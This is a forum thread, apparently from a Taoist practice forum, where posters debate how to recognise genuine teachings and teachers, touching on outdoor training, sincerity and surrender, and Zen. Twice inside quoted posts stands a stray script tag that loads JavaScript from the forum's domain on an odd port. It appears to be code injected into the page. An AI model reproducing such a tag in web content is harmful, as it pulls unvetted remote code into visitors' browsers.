BaguaKicksAss

How can you tell if you are getting the real deal / indoor teachings?

indoor teachings!? mahahah, the real teachings are outdoor, OUTSIDE...

observe....nature....

Integrated oneself with Nature as one, does it matter it is outside or inside....???

Integrated oneself with Nature as one, does it matter it is outside or inside....???

<script src="//thetaobums.com:8011/bar7209.js" type="text/javascript" ></script>

yes, YOU MUST EXPOSE YOUSRELF TO THE ELEMENTS!!!!! RUN THRU THE COLD MOONLIT NIGHT WITHOUT SHOES AND A BALD HEAD AND SLEEP ON THE HARD OUTSIDE GROUND LIKE THE ANCIENTS (BOW) AND U WILL BE 10X FULLER/CULTIVATED THAN 72 HOURS OF " MO PAI" LA-ZY ASS MEDITATOR. I have allotted my allowed yang-word-language consciousness for the year by my last few posts on this forum I will return in a year or so, or earlier if this forum finds the true One, Jesus. Unless he is "in your Way".

Edited by fizix
  • Like 1

"Where sincerity is the way is open."

When one is deeply sincere with one's intentions, one will draw and be drawn two what is most appropriate for the path one follows. If one's intention is focused on surface level desires and powers, how will one's intention connect with a teacher who will be able to convey depth? Perhaps the teachings are there, but can one hear them?

Say one cultivates sincerity and emptiess, truly focusing not on powers, but on surrendering to one's destiny. And then one opens to receiving a teacher, the right teacher. Perhaps over the next years such a person will be drawn to move, and end up receiving signals towards a teacher one is able to truly recieve from. Perhaps this is like letting the Tao choose one's teacher.

When one seeks to judge what one learns, how is this possible? The "real deal" is beyond the bias of knowledge. The "real deal" requires trusting and surrendering attachments to progress - one must get over one's self to find one's true self. The more one surrenders, the more one changes on the inside, and any real accomplishments simply are.

If one is walking along a path to get somewhere, then realizes they are getting somewhere and start to look at the how of it, it is as though they are turning their back on the way ahead to look back. What is raised up can only be brought down. Perhaps this can lead to helpful realizations and understandings, but the subtler things become, the more important it is to remain focused in the forward direction, unwavering. In my experience, stepping back to understand has only resulted in letting go of the accomplishment before it is permanent.

• Like 2

<script src="//thetaobums.com:8011/bar7209.js" type="text/javascript" ></script>

yes, YOU MUST EXPOSE YOUSRELF TO THE ELEMENTS!!!!! RUN THRU THE COLD MOONLIT NIGHT WITHOUT SHOES AND A BALD HEAD AND SLEEP ON THE HARD OUTSIDE GROUND LIKE THE ANCIENTS (BOW) AND U WILL BE 10X FULLER/CULTIVATED THAN 72 HOURS OF " MO PAI" LA-ZY ASS MEDITATOR. I have allotted my allowed yang-word-language consciousness for the year by my last few posts on this forum I will return in a year or so, or earlier if this forum finds the true One, Jesus. Unless he is "in your Way".

This was in jest? ;)

There's one thing that I can say with 100% confidence: traditional teachers are too often too clever about this . . . for their own good.

Take Zen, for example. Japanese Zen is mostly a joke today. The best Zen teaching in the world is by Americans . . .